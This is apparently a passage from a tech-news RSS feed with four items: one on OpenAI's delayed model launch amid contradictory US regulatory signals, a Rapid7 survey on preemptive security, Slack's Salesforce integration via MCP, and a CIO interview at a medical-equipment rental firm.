<pubDate>Wed, 08 Jul 2026 21:02:32 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>As enterprises struggle to manage their AI strategies, the US AI regulatory environment is sending a wide range of contradictory signals. OpenAI’s Wednesday announcement that it will now release GPT-5.6 Sol, along with Terra and Luna, on Thursday highlights the confusion.</p>



<p>Initially, the US government said that it was asking OpenAI to <a href="https://www.infoworld.com/article/4190089/us-tells-openai-to-restrict-access-to-its-most-powerful-ai-model-2.html" target="_blank">limit access to its top models</a>, including the three releasing Thursday, to a short list of companies. OpenAI seemingly agreed and held back their general availability.</p>



<p>But on Wednesday, OpenAI reversed its position, with <a href="https://x.com/OpenAI/status/2074704958419792299?s=20" target="_blank" rel="noreferrer noopener">a statement on X</a> saying simply: “GPT-5.6 Sol, along with Terra and Luna, will launch publicly this Thursday. We’re expanding preview access globally now.” No details were released about the extent of the expansion.</p>



<p>Then the White House issued a statement, a copy of which it emailed to <em>InfoWorld</em>, saying that the US government “did not give OpenAI a ‘green light,’ approval or clearance to release its models. No such permission is required or granted. The Administration does not provide approvals for private companies to release AI models – decisions on timing and scope of releases rest entirely with the companies.”</p>



<p>The statement then quoted from the <a href="https://www.whitehouse.gov/presidential-actions/2026/06/promoting-advanced-artificial-intelligence-innovation-and-security/" target="_blank" rel="noreferrer noopener">June 2 White House executive order</a> that said, “nothing in this section shall be construed to authorize the creation of a mandatory governmental licensing, preclearance, or permitting requirement for the development, publication, release, or distribution of new AI models, including frontier models.” It also said, “any testing or meetings with government experts is voluntary. Participation is not required to release a model.”</p>



<p>Yet last month, the US Commerce Department weighed in <a href="https://www.cio.com/article/4186429/anthropic-fable-dispute-suggests-export-no-longer-means-what-it-used-to.html" target="_blank">on how Anthropic’s models can be distributed</a>. </p>



<h2 class="wp-block-heading">The ‘worst of both worlds’</h2>



<p><a href="https://www.linkedin.com/in/lewiscarhart/" target="_blank" rel="noreferrer noopener">Lewis Carhart</a>, CEO of software development firm Comp AI, said the statement is frustrating for IT executives on multiple fronts. </p>



<p>“Think about what that [White House statement] means. OpenAI stationed engineers in Washington for weeks, submitted to government testing, staggered its launch at the government’s request. And the official position is that none of that was required,” Carhart said. “We now have a de facto licensing regime that legally doesn’t exist. There’s no statute, no appeal process, no published criteria. Just [the US Department of] Commerce deciding model by model what ships and when.”</p>



<p>That’s the worst of both worlds, he noted: “All the friction of regulation with none of the predictability. Compliance people have a name for this – it’s an audit with no framework. And the precedent is now locked in for both frontier labs: if you build at the frontier, your launch calendar runs through Washington whether the law says so or not.”</p>



<p>Carhart argued that this regulatory reality should be of extreme concern to enterprise IT executives, given it indicates that model availability is now “a regulatory variable” not driven by the vendor roadmap.</p>



<p>“Anthropic’s most advanced models disappeared from the market for three weeks in June. It was not because of an outage, not because of a pricing change. It was because of an export control directive,” he pointed out. “If your AI architecture assumes the model you deployed today is available tomorrow, that assumption is now demonstrably false. Multi-model resilience just went from nice to have to a board-level risk item.”</p>



<p>It also offers an opportunity, given that a model that cleared government security testing is a model that auditors and boards sign off on faster. “Government review is quietly becoming a procurement asset,” he observed. “The CIOs who win here are the ones who treat ‘regulatory posture of the model itself’ as a line item in vendor risk assessments – most risk teams are still only looking at the provider’s SOC 2 attestation.”</p>



<p><a href="https://moorinsightsstrategy.com/team/jason-andersen/" target="_blank" rel="noreferrer noopener">Jason Andersen</a>, principal analyst at Moor Insights &amp; Strategy, agreed with Carhart and described the overall back-and-forth as “a bit of pageantry. OpenAI needs its model to look as powerful, potentially dangerous, as Anthropic’s so it can be a contender to be at the absolute frontier. It also helps to burnish OpenAI’s PR efforts to look more responsible than it has in the past.”</p>



<p>Furthermore, he added, “tech CEOs are acutely aware that flattery towards this administration could keep regulators or the threat of regulation at bay.”</p>



<h2 class="wp-block-heading">Criteria not clear</h2>



<p><a href="https://www.infotech.com/profiles/brian-jackson" target="_blank" rel="noreferrer noopener">Brian Jackson</a>, a principal research director at Info-Tech Research Group, echoed the political concerns. </p>



<p>“What’s still not clear is the actual criteria being used to deem the models safe for release. The government has said that it’s concerned about cybersecurity risk as well as the risk of AI being used to develop biological weapons,” he said. “But so long as the actual release criteria lack transparency, there will be some perception that the evaluation could be politically motivated.”</p>



<p>Jackson said that one, presumably unintended, result of the US government’s efforts to control AI rollouts is that it is making companies look far more seriously at using non-US vendors for AI strategies. </p>



<p>“Organizations are looking for alternatives to the private US-based cloud-delivered frontier models. That’s so they can maintain control over their AI supply chain,” he said. “Chinese open source models are one option that’s available, but there are other options too, from Canada and Europe. Companies can either set up AI access through other APIs not connected to US-based AI providers, or download open-source models to run locally.”</p>



<p>He noted that the added US regulatory risk means that some organizations will avoid becoming entrenched within OpenAI’s and Anthropic’s interfaces, where there’s no option to swap out the LLMs for an alternative.</p>



<h2 class="wp-block-heading">Impacts enterprise AI strategy</h2>



<p><a href="https://zenity.io/authors/rock-lambros" target="_blank" rel="noreferrer noopener">Rock Lambros</a>, director of AI standards and governance at AI agent vendor Zenity, shared the frustration that little to no actionable compliance data is being released. </p>



<p>“Nobody outside a closed room can tell you what standard [the model] passed because it was never written down. For two weeks, [US government officials] kept a model out of defenders’ hands that’s better at guarding your network than breaking into anyone else’s,” Lambros said. “Call that a security review if it helps you sleep better. But it reads to me like a bouncer working a velvet rope nobody hired him to run, waving people through today because he’s in a better mood than he was a couple of weeks ago.”</p>



<p>This unpredictability is likely to have impacts on AI strategy far beyond traditional compliance concerns, Lambros said.</p>



<p>“We’ve built way too much operational reliance on these models to hang it on a review with no rulebook,” he said, pointing out that hospitals, pipelines, banks and water utilities are relying on frontier AI whose availability “can swing from ‘on’ to ‘off’ to ‘on’ with no notice, no appeal, and no published standard behind any of it.”</p>



<p>“You can’t run critical infrastructure on a tool that runs fine Friday and is offline by Monday because an approval process nobody can see reached a verdict nobody can predict,” Lambros said. “That is a supply chain risk with a government hand on the switch, and almost nobody has priced it into a continuity plan.”</p>



<p>To protect themselves, companies need to adjust their expectations. “Treat model availability like any single point of failure you don’t own by standing up a fallback you’ve tested, getting a continuity clause in your contract, and drilling for the blackout, because ‘the government backed off this time’ is not a plan,” he advised.</p>



<p><em>This article originally appeared on <a href="https://www.infoworld.com/article/4194598/openai-to-release-delayed-models-thursday-amidst-a-sea-of-regulatory-confusion.html" target="_blank">InfoWorld</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security Teams Are Ready To Become More Preemptive. What’s Holding Them Back?]]></title>
<description><![CDATA[The shift toward preemptive security is underway, but most organizations are still navigating the realities of limited resources, fragmented tools, and emerging AI risk. At Rapid7’s recent Global Security Summit, we surveyed attendees to better understand where security leaders and practitioners ...]]></description>
<link>https://tsecurity.de/de/3654445/it-security-nachrichten/security-teams-are-ready-to-become-more-preemptive-whats-holding-them-back/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654445/it-security-nachrichten/security-teams-are-ready-to-become-more-preemptive-whats-holding-them-back/</guid>
<pubDate>Wed, 08 Jul 2026 15:23:58 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><span>The shift toward preemptive security is underway, but most organizations are still navigating the realities of limited resources, fragmented tools, and emerging AI risk. At Rapid7’s recent </span><a href="https://rapid7.brighttalk.com/?utm_source=blog&amp;utm_medium=website&amp;utm_content=survey-blog&amp;utm_campaign=global-mdr-2026-global-virtual-summit-prospect-eng-nom-25" target="_blank"><span>Global Security Summit</span></a><span>, we surveyed attendees to better understand where security leaders and practitioners stand today, what is shaping their priorities, and what they need to move forward. Their responses offer a candid view into the current state of security operations: ambitious, increasingly AI-aware, and ready for change, but still working through the practical challenges of getting there.</span></p><p><span>For many teams, the direction is clear: security needs to become more proactive, more connected, and more resilient. Attackers are moving quickly, environments are expanding, and teams are under pressure to reduce risk before it turns into business disruption. But the survey results show that most organizations are still somewhere in the middle of that journey.</span></p><h2>Where organizations are today</h2><p><span>One of the clearest findings is that security operations are increasingly collaborative. According to the survey, 57% of respondents operate in a hybrid internal and MDR model. That reflects a reality many teams know well: internal expertise remains essential, but external support can help extend coverage, add specialist knowledge, and support faster response when internal resources are stretched.</span></p><p><span>This hybrid model also speaks to the complexity security teams are managing. Modern environments span cloud, identity, endpoints, applications, third parties, and expanding attack surfaces. Keeping watch across all of it requires more than tooling alone. It requires the right mix of people, process, visibility, and support.</span></p><p><span>At the same time, many organizations are still working to connect the dots across their security ecosystem. Two-thirds of respondents said their security capabilities are only partially integrated. For analysts, partial integration often means more manual work: switching between tools, stitching together context, and making decisions with an incomplete picture. When teams are jumping between systems, manually stitching together context, or working from incomplete data, it becomes harder to act at the speed modern threats demand.</span></p><p><span>The survey also showed that only 10% of respondents describe their organization as “highly proactive” in predicting and preventing threats, which points to the reality of where many teams are today. The ambition is there, but becoming truly preemptive takes time, integration, and operational maturity. Most organizations are still balancing the day-to-day demands of reactive response with the longer-term work of building a more proactive security model.</span></p><p><span>Confidence levels tell a similar story. 59% of respondents said they are only somewhat confident in their organization’s ability to prevent attacks before impact. Security teams understand what is at stake, but many still lack full confidence that they can consistently stop threats before they affect the business.</span></p><h2>AI is a priority, but trust matters</h2><p><span>AI was, of course, another major theme in the survey. Interest is high, especially when it comes to improving efficiency, accelerating triage, and helping teams manage growing volumes of data and alerts, but adoption is still developing. 52% of respondents said AI is in early-stage exploration within their security operations.</span></p><p><span>AI has clear potential in the SOC and across security operations, from summarizing investigations to enriching alerts, supporting prioritization, and helping analysts move faster. But security teams have to be deliberate about how they apply it. In high-pressure environments where accuracy, context, and accountability matter, AI needs to earn trust.</span></p><p><span>The survey results show that trust is still a key consideration. 57% of respondents cited securing AI usage as a top AI and security concern, while 44% cited lack of transparency or trust. These responses reflect a practical mindset. Security leaders are thinking about both sides of AI: how it can help defenders move faster, and how to manage the new risks it introduces. Internally, for AI to become operationally valuable, it has to fit into existing workflows, provide explainable outputs, and support human expertise.</span></p><h2>What security teams want next</h2><p><span>When respondents were asked what is preventing them from becoming more proactive, the top challenges were practical and familiar. 54% cited limited staff or expertise, making capacity one of the biggest barriers to progress. Teams may have the ambition to become more preemptive, but many are already balancing daily alert queues, incident response, vulnerability backlogs, compliance pressure, and business-as-usual security demands.</span></p><p><span>Visibility is another major factor. 31% of respondents cited lack of visibility across the environment as a barrier to becoming more proactive. Without a clear view of assets, identities, exposures, and attacker activity, teams struggle to prioritize what matters most. This is especially important as organizations look to move from broad detection toward more risk-aware, preemptive action.</span></p><p><span>The priorities respondents selected show where they want to go next. 41% selected preemptive security as a top security leadership priority, while improving resilience, strengthening incident response, reducing complexity, and improving risk visibility also appeared as recurring themes.</span></p><p><span>The findings from our Global Security Summit make one thing clear: security teams are ready to move toward more proactive, integrated, and AI-enabled operations, but they need the right visibility, expertise, and confidence to do it well.</span></p><p><span>To hear more from the experts and practitioners who joined us at the summit, catch up on the </span><a href="https://rapid7.brighttalk.com/?utm_source=blog&amp;utm_medium=website&amp;utm_content=survey-blog&amp;utm_campaign=global-mdr-2026-global-virtual-summit-prospect-eng-nom-25" target="_blank"><span>on-demand sessions</span></a><span>. And to learn how Rapid7 is helping organizations move toward preemptive security, explore </span><a href="https://www.rapid7.com/campaign/managed-detection-and-response/?utm_source=blog&amp;utm_medium=website&amp;utm_content=survey-blog&amp;utm_campaign=global-mdr-2026-global-virtual-summit-prospect-eng-nom-25" target="_blank"><span>Rapid7 Managed Detection and Response</span></a><span>, built to disrupt attackers earlier with broad ecosystem coverage, risk visibility, expert guidance, and an AI-powered SOC.</span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Slack’s Slackbot can now pull your CRM data, generate charts, and send DocuSigns — all from a chat message.]]></title>
<description><![CDATA[Five years and $27.7 billion after Salesforce acquired Slack, the two products are finally starting to function as a single system. On Tuesday, Slack launched an integration that connects Slackbot — the personal AI agent built into every workspace — to the entire Salesforce platform, including CR...]]></description>
<link>https://tsecurity.de/de/3654241/it-nachrichten/slacks-slackbot-can-now-pull-your-crm-data-generate-charts-and-send-docusigns-all-from-a-chat-message/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654241/it-nachrichten/slacks-slackbot-can-now-pull-your-crm-data-generate-charts-and-send-docusigns-all-from-a-chat-message/</guid>
<pubDate>Wed, 08 Jul 2026 14:18:13 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Five years and $27.7 billion after Salesforce acquired Slack, the two products are finally starting to function as a single system. On Tuesday, <a href="https://slack.com/">Slack</a> launched an integration that connects <a href="https://slack.com/features/slackbot">Slackbot</a> — the personal AI agent built into every workspace — to the entire Salesforce platform, including CRM data, Tableau analytics, Data 360 customer profiles, and a growing constellation of third-party applications, all through a single conversational prompt.</p><p>The mechanism behind the expansion is a set of dedicated <a href="https://modelcontextprotocol.io/docs/getting-started/intro">Model Context Protocol (MCP)</a> servers from Salesforce that connect Slackbot to the company's <a href="https://venturebeat.com/technology/salesforce-launches-headless-360-to-turn-its-entire-platform-into-infrastructure-for-ai-agents">Headless 360 infrastructure</a>. In practical terms, a salesperson can now ask Slackbot for a customer's deal history, receive a live Tableau visualization of pipeline trends, update a CRM record, and trigger a DocuSign approval — without ever switching tabs or logging into another application. According to Slack, the Salesforce IT team has already used this architecture to save its 1,500-plus engineers "thousands of custom coding hours annually."</p><p>The timing is not accidental. Slack is making this move amid escalating competitive pressure from Microsoft Teams, which claims <a href="https://techcommunity.microsoft.com/discussions/microsoftteams/teams-grows-to-320-million-monthly-active-users/3964746">320 million-plus monthly active users</a> and has Copilot embedded across the Office suite, and from Google, which continues to weave <a href="https://www.computerworld.com/article/4143838/google-embeds-gemini-ai-deeper-into-workspace-apps.html">Gemini deeper into Workspace</a>. And just days ago, The Information reported that some smaller companies are using Anthropic's Claude to r<a href="https://www.theinformation.com/articles/small-firms-use-claude-quit-salesforce">eplace Salesforce CRM entirely</a> — one Atlanta-based property management firm with about 55 employees reportedly saved around $100,000 annually by building a custom replacement using Claude Code and Replit.</p><p>Against that backdrop, Slack CMO Ryan Gavin sat down for an exclusive interview with VentureBeat to frame the announcement and argue that the company's future depends on an idea he calls "multiplayer AI" — and that the 25 years of customer data locked inside Salesforce is an asset no vibe-coded alternative can replicate.</p><h2><b>Why Slack's CMO believes 'multiplayer AI' is the next big enterprise battleground</b></h2><p>Gavin's core argument is that the enterprise AI conversation has been stuck in single-player mode for too long, and that Slack is uniquely positioned to break it open.</p><p>"So much of what we've seen are just these incredible tools that have largely been single-player, incredible tools for individual productivity, helping people complete tasks and write code," Gavin told VentureBeat. "But as we've always known at Slack ever since our inception, work is a team sport. For AI to really take hold in the enterprise, it has to be multiplayer."</p><p>The distinction matters commercially. Most AI assistants today — ChatGPT, Claude, Copilot — default to one-on-one conversations with a single user. A researcher queries a model, gets a response, and acts on it alone. The insight stays in a private chat window, invisible to colleagues. Gavin argues this creates a new version of the tab-switching problem that plagued pre-AI enterprise software, except now employees are also navigating dozens of individual agent interfaces on top of their existing applications.</p><p>"It's going to benefit almost no one if every enterprise application out there spawns hundreds of agent babies, and employees end up in a worse world than they were before," Gavin said.</p><p>Slack's answer is to make <a href="https://slack.com/features/slackbot">Slackbot</a> the orchestration layer. Because everything happens in shared channels, any action an agent takes — pulling a customer profile, flagging a deal risk, updating a Jira ticket — is visible to the entire team. A colleague can redirect, build on, or correct the agent's work in real time.</p><h2><b>How MCP and Salesforce's headless 360 platform power Slackbot's new capabilities</b></h2><p>The technical backbone of the announcement is the <a href="https://modelcontextprotocol.io/docs/getting-started/intro">Model Context Protocol</a>, an open standard originally developed by Anthropic that defines how AI models discover and invoke external tools. MCP has seen rapid adoption across the AI tooling ecosystem. By early 2026, it had been adopted by <a href="https://claude.com/product/claude-code">Claude Code</a>, <a href="https://cursor.com/">Cursor</a>, <a href="https://github.com/features/copilot">GitHub Copilot</a>, and OpenAI's tooling, with managed hosting available from <a href="https://aws.amazon.com/">AWS</a>, <a href="https://www.cloudflare.com/">Cloudflare</a>, and <a href="https://vercel.com/">Vercel</a>. As a <a href="https://dev.to/swrly/model-context-protocol-mcp-explained-why-it-matters-in-2026-1c7i">DEV Community explainer</a> puts it, MCP "is the closest thing the AI tooling ecosystem has to a standard."</p><p>In this implementation, Salesforce exposes its platform capabilities — CRM records, Tableau visualizations, Data 360 customer profiles, Agentforce agents — as MCP servers. Slackbot operates as an MCP client, connecting to those servers and routing user queries to the appropriate back-end system. When a user asks Slackbot about a customer, the bot discovers which MCP tools are relevant, calls them, and synthesizes the results into a single response — all within the Slack conversation.</p><p>Gavin explained the architecture in simple terms: "Salesforce is extending what has always been our open platform through our Headless 360 strategy — making all of these MCP endpoints available. And then Slackbot acts as an MCP client, connecting to those MCP servers and bringing all that data in within the confines of a trusted permission platform."</p><p>That permission layer is critical. Slackbot respects each user's Salesforce permissions, meaning a marketing coordinator cannot accidentally access sales pipeline data they are not authorized to see. Validation rules, field-level security, and org-wide data boundary configurations carry over automatically. For admins, setup requires no custom integration code — Salesforce MCP servers can be discovered, installed, and governed from a single UI using the existing Slack-Salesforce connection.</p><p>Salesforce first introduced the <a href="https://venturebeat.com/technology/salesforce-launches-headless-360-to-turn-its-entire-platform-into-infrastructure-for-ai-agents">Headless 360</a> concept at its <a href="https://www.salesforce.com/tdx/">TDX developer conference</a> in April, positioning it as an API-driven layer that exposes the platform's data, workflows, and governance controls so that software agents, rather than human users, can execute business processes directly. As <a href="http://cio.com/">CIO.com reported</a> at the time, analysts viewed the move as an effort by Salesforce "to position itself as a central layer for managing agent-driven operations across different business functions."</p><h2><b>Slack says it's betting on openness, not on any single AI protocol</b></h2><p>When asked whether Slack is making a risky bet on MCP as a protocol — given that standards in AI tooling can shift rapidly — Gavin reframed the question entirely.</p><p>"We're not betting on MCP, per se. We're betting on what we've always bet on, which is that Slack is an open platform," Gavin told VentureBeat. "MCP happens to be the best agent-to-agent protocol that the industry is rallying around right now, but if something better came out tomorrow, you'd see the same pattern from Slack — we're going to stay open. MCP and APIs are simply tools that facilitate that."</p><p>That open-platform philosophy is central to Slack's identity and, Gavin argues, its competitive differentiation. Slack already hosts <a href="https://slack.com/resources/why-use-slack/what-is-slack-and-how-does-it-work">more than 2,600 app integrations</a>. The new MCP-native partner ecosystem includes <a href="https://www.atlassian.com/">Atlassian</a>, <a href="https://www.box.com/home">Box</a>, <a href="https://www.docusign.com/">DocuSign</a>, <a href="https://www.canva.com/">Canva</a>, <a href="https://lucid.co/">Lucid</a>, <a href="https://www.zoom.com/">Zoom</a>, and more than 25 additional companies, each of whose agents can be added directly to shared Slack channels. <a href="https://www.mulesoft.com/">MuleSoft Agent</a>, now connected to Slackbot, helps manage integrations for the team — checking system health or surfacing critical error alerts in the same workspace where the team is already collaborating.</p><p>But MCP is not without trade-offs. The protocol requires tool discovery on every connection, and large tool libraries can consume significant context tokens. One technical analysis noted that a server exposing 300 tools could cost 5,000 to 10,000 tokens per session before the model does any useful work. For an enterprise like Salesforce with hundreds of potential tools across CRM, analytics, and service platforms, careful filtering and segmentation of MCP servers become essential design decisions — a challenge the company will need to navigate as the ecosystem scales.</p><h2><b>Inside Slack's complicated relationship with Anthropic and the Claude question</b></h2><p>Perhaps the most delicate topic in the interview concerned Slack's relationship with Anthropic, the AI lab behind Claude — and one of Slack's most visible power users. Just last week, <a href="https://venturebeat.com/technology/anthropic-launches-claude-tag-replacing-its-slack-app-with-a-persistent-ai-teammate-that-learns-monitors-and-works-autonomously">Anthropic launched Claude Tag</a>, a persistent AI teammate that works inside Slack channels, prompting confusion among Salesforce employees who worried it competes directly with Slackbot and Agentforce. The Information reported <a href="https://www.theinformation.com/articles/salesforce-employees-worry-anthropics-invasion-slack">internal anxiety</a> about whether Salesforce was welcoming a competitor into its own living room. Salesforce has financial reasons to maintain the partnership: the company reportedly expects to spend $300 million on Anthropic tokens this year and holds a stake in Anthropic.</p><p>Gavin addressed the tension head-on, framing it as a feature of Slack's platform strategy rather than a threat.</p><p>"We're incredibly excited and bullish about what Anthropic is bringing into Slack. Period. End of statement," Gavin said. He noted that Anthropic "is building roughly 65% of their code with Claude in Slack," and pointed out that ChatGPT was originally built in Slack, as was Perplexity.</p><p>"Building nowadays happens in the open, and every company is going to be building in the open with tools like this, and you need a platform to build in the open," Gavin said.</p><p>His argument is that feature overlap between <a href="https://slack.com/features/slackbot">Slackbot</a>, <a href="https://www.anthropic.com/news/introducing-claude-tag">Claude Tag</a>, and other third-party agents is "actually a feature, not a bug" — a sign of a healthy platform rather than a competitive vulnerability. He compared it to an ecosystem where multiple products serve similar needs but win on craftsmanship, ease of use, and integration depth.</p><p>"One of the reasons Slackbot has been the fastest-adopted feature in Salesforce history is the simplicity, the approachability — underpinned by the trust that comes from having an agent that knows me, knows my tone, knows my work, knows my people, knows my data," Gavin said.</p><p>The distinction Slack draws is structural: Slackbot has access to a user's full workspace context, Salesforce data, permissions, and connected applications by default. Claude Tag, by contrast, only sees the channels it is explicitly added to. For Slack's leadership, that asymmetry is the moat.</p><h2><b>How Slack plans to compete with Microsoft Teams and Google in the AI era</b></h2><p>Asked directly about competitive positioning against <a href="https://www.microsoft.com/en-us/microsoft-teams/log-in">Microsoft Teams</a> and <a href="https://workspace.google.com/">Google Workspace</a>, Gavin pointed to Slack's open channel architecture as the differentiator no competitor can replicate.</p><p>"If you spend any time in Teams, it's a lovely tool for chat, direct messages, and video, but it has no platform for open communication across organizations," Gavin said. "Its SharePoint-based architecture is fundamentally limiting."</p><p>He cited <a href="https://www.shopify.com/">Shopify</a> as an example, where an internal AI agent called <a href="https://www.ashgaliyev.com/shopify-river.html">River</a> is deployed across approximately 4,400 channels serving 6,000 employees. He also referenced a <a href="https://fortune.com/2026/06/27/microsoft-copilot-boss-jacob-andreou-tapped-by-satya-nadella-to-save-ai-strategy/">Fortune report</a> noting that Microsoft's own head of AI mandated that his team run on Slack rather than Teams — a pointed detail Gavin clearly relished. "There's a reason for that," he said. "We're in an era right now where openness matters, and all the other tools you mentioned, they're still relatively closed."</p><p>The competitive pressure is real and intensifying. Microsoft has integrated Copilot across its entire productivity suite, giving it a distribution advantage that reaches virtually every Fortune 500 company. Google has been similarly aggressive with Gemini across Workspace. And new entrants are crowding the market: a startup called <a href="https://viktor.com/hire-an-ai-employee?gad_source=1&amp;gad_campaignid=23610878065&amp;gbraid=0AAAABC9uvB--JiQPb5do0TpcAnPyKB3Gz&amp;gclid=CjwKCAjwx7LSBhB3EiwAjcodxAmoASmBycYGHkrfafr1WOuFKNG5AQYQLWLmYZLmc1diiKMM0wOKARoCa1sQAvD_BwE">Viktor</a>, which embeds AI agents inside Slack and Teams workspaces, recently raised a <a href="https://viktor.com/blog/viktor-series-a">$75 million Series A</a> led by Accel — with Slack cofounders Stewart Butterfield and Cal Henderson participating as angel investors.</p><p><a href="https://www.box.com/home">Box</a>, one of the enterprise customers highlighted in the announcement, told Slack it aims to have its sellers complete 75 to 80 percent of their work inside Slack. Gavin repeated that figure as evidence that the platform is becoming the default workspace for entire organizations, not just engineering teams — a shift he believes accelerates as AI makes every employee a builder.</p><h2><b>Slack's biggest long-term play is making Salesforce's CRM useful to everyone in the company</b></h2><p>Gavin saved what he considers the most underappreciated element of the announcement for last: the democratization of Salesforce's CRM.</p><p>For 25 years, Salesforce's CRM has been used primarily by sales, service, and marketing professionals — a relatively modest percentage of a company's total workforce. The promise of Slackbot as a conversational interface is that any employee, regardless of their role or technical fluency, can now query and act on CRM data simply by asking a question in natural language.</p><p>"What most people don't realize is that this democratization of CRM is going to take its usage from a modest percentage of employees to the entire enterprise," Gavin said. "When you can make systems like Data 360 or Agentforce for Sales accessible to the entire employee base — not just a percentage — think about how much more valuable those investments become."</p><p>He cited <a href="https://engine.com/">Engine</a>, a company that handles 800,000 customer inquiries a year, as an example. Previously, answering a customer inquiry required a specific employee with access to a specific tool to look up a customer's history. Now, anyone in the company can ask Slackbot and see a complete customer profile, review case history, and write updates — all without being retrained or learning a new interface. Engine's CEO Elia Wallen, in a statement sent to VentureBeat, described the integration as enabling employees to "make data-driven decisions and take action without leaving the conversation."</p><p>The financial logic is straightforward: if Salesforce can make its platform useful to 100 percent of a customer's workforce rather than the 20 or 30 percent who currently hold licenses, the value of the existing Salesforce investment multiplies without requiring a proportional increase in spending. That pitch becomes especially potent at a time when CIOs are scrutinizing every line of their AI budgets.</p><h2><b>What analysts and CIOs should watch as Slack rolls out its biggest AI update yet</b></h2><p>The announcement is a significant architectural evolution for Slack, but several questions remain unanswered.</p><p>First, pricing. The company did not directly address whether Slackbot's MCP-powered Salesforce integration will require additional SKUs or license tiers. As Info-Tech Research Group analyst Scott Bickley <a href="https://www.cio.com/article/4178840/salesforces-headless-360-monetization-play-could-give-cios-a-familiar-budgeting-headache.html">cautioned</a> when Headless 360 was first announced in April, "Salesforce's MO seems to be to announce new capabilities that require SKUs. CIOs should be asking about pricing now."</p><p>Second, performance. Routing user queries through MCP servers to Salesforce back-end systems introduces latency that could affect the conversational feel Slack prides itself on. Neither the press release nor the interview disclosed SLAs for MCP tool calls — a gap that enterprise buyers will want addressed.</p><p>Third, the competitive dynamics of the platform play. Slack's open-platform philosophy invites powerful partners like <a href="https://www.anthropic.com/">Anthropic</a> and <a href="https://openai.com/">OpenAI</a> into its ecosystem, but those same partners are building their own surfaces for enterprise work. Anthropic reportedly plans to expand Claude Tag to Microsoft Teams, email, and other project management tools — meaning the partner Salesforce is paying hundreds of millions a year is building the infrastructure to be useful without Slack at all.</p><p>And fourth, the broader existential question facing all enterprise software: whether AI agents will ultimately reduce the need for CRM systems entirely. Gavin's pitch — that Slack makes CRM more valuable by making it more accessible — is the inverse of the bear case. The market will ultimately decide which thesis prevails.</p><p>Salesforce reported record first-quarter revenue of <a href="https://investor.salesforce.com/news/news-details/2026/Salesforce-Delivers-Record-First-Quarter-Fiscal-2027-Results/default.aspx">$11.1 billion in fiscal Q1 2027</a>, with <a href="https://investor.salesforce.com/news/news-details/2026/Salesforce-Delivers-Record-First-Quarter-Fiscal-2027-Results/default.aspx">Agentforce ARR surpassing $1 billion</a> for the first time and combined AI and data ARR reaching $3.4 billion. Those numbers suggest the AI strategy is beginning to generate real revenue, even as the company navigates a market that remains uncertain about the long-term trajectory of legacy enterprise software.</p><p>"Slack has quickly moved from this beloved collaboration tool from the last ten years to now this multiplayer AI platform that we call a work operating system," Gavin said.</p><p>Five years ago, <a href="https://www.cnbc.com/2020/12/01/salesforce-buys-slack-for-27point7-billion-in-cloud-companys-largest-deal.html">Salesforce paid $27.7 billion</a> for what was, at its core, a very good group chat application. On Wednesday, it started trying to prove that group chat was never the product — it was the foundation. In the age of AI agents, the most valuable real estate in enterprise software may not be the database where the data lives. It may be the conversation where the decisions get made.</p><p>
</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The tech behind patient-first transformation at USME]]></title>
<description><![CDATA[As a medical equipment rental company that rents, sells, and manages movable medical devices, including infusion pumps, monitors, ventilators, and incubators, USME’s mission is simple in definition, but highly sophisticated in practice.



“Our job is to deliver the right equipment to the right p...]]></description>
<link>https://tsecurity.de/de/3653925/it-security-nachrichten/the-tech-behind-patient-first-transformation-at-usme/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653925/it-security-nachrichten/the-tech-behind-patient-first-transformation-at-usme/</guid>
<pubDate>Wed, 08 Jul 2026 12:08:54 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>As a medical equipment rental company that rents, sells, and manages movable medical devices, including infusion pumps, monitors, ventilators, and incubators, USME’s mission is simple in definition, but highly sophisticated in practice.</p>



<p>“Our job is to deliver the right equipment to the right place at the right time,” says CIO Antonio Marin. “When you look at the community we serve, the last part of the supply chain is a patient in need. So we need to make sure all our technology, processes, and everything we do has a patient in mind. After all, they call us because they need lifesaving equipment, not because it’s a beautiful day.”</p>



<p>A particularly vital application of technology for Marin and his team has been directed to revamping the company’s inventory and equipment management, and field services.</p>



<p>“We did a lot of automation behind the scenes,” he says. “Knowing your inventory, knowing what parts you need to fix, and tracking the lifecycles of inventory is all now very automated, well managed, and fully visible across the organization. It’s about humans making critical decisions, not doing paperwork.”</p>



<p>But with that added efficiency comes some risk. And when lives are on the line in a highly regulated sector, vulnerabilities can surface with more tech that’s introduced. So some innovations can be more detrimental to the operations of a company or a hospital.</p>



<p>“We use encryption and different systems to overlay protection when it comes to personal identification data,” Marin says. “When you look at the cybersecurity chain, humans are still the weakest link.”</p>



<p>When talking about security, particular care needs to be taken in terms of knowing exactly where the team and equipment are at all times, and tracking performance across company and hospital staff, and hospital partners.</p>



<p>“As a person in IT and as an employee of the company, it’s very rewarding when we’re able to deliver lifesaving equipment so hospitals can succeed in helping patients,” he says.</p>



<p>Marin also discusses the importance tech and human synergy, prioritizing education in regard to cybersecurity, and the power of automating processes. Watch the full video below for more insights, and be sure to subscribe to the monthly Center Stage newsletter by clicking <a href="https://www.cio.com/newsletters/signup/">here</a>.</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



